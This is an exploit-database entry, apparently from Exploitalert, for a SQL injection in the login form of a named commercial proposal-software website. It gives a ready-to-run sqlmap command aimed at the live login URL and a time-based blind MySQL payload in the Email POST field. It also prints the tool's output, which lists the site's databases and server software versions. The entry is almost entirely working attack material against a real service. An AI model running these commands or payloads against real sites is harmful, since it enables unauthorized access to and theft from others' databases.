CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89: Improper Neutralization of Special Elements used in an SQL Command | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-07-27 |
# Exploit Title: Better Proposals: Online Proposal Software | SQL Injection Vulnerability
# Author:
# Tested On: Kali Linux
# sqlmap -u "https://betterproposals.io/2/login/" --form --dbs --batch
---------------------------------------------------------------------------------------------------
.io British Territories in the Indian Ocean
Better Proposals: Online Proposal Software
Online Proposal Software - Better Proposals
https://betterproposals.io/2/login/
---
Parameter: Email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: Email=rLlf' AND (SELECT 5491 FROM (SELECT(SLEEP(5)))kKlT) AND 'hbrR'='hbrR&Password=&login=Sign In&RememberMe=1
---
the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.40
the back-end DBMS: MySQL >= 5.0.12
available databases [8]:
[+] better_blog
[+] information_schema
[+] innodb
[+] mysql
[+] performance_schema
[+] rpawsuebaq
[+] sys
[+] tmp
Copyright ©2024 Exploitalert.